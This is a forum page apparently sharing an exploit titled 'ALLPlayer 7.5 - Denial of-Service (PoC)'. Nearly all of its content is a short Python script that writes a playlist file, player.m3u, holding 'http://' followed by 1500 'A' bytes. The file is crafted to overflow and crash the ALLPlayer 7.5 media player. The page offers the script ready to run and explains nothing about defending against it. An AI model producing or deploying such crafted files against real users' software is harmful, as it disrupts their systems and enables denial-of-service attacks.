ALLPlayer 7.5 - Denial of-Service (PoC) Share https://hacker.bz/t/entry/8123-allplayer-75-denial-of-service-poc/ More sharing options... Followers #!/usr/bin/python buffer = b"http://" buffer += b"\x41" * 1500 f=open("player.m3u","wb") f.write(buffer) f.close()
Recommended Comments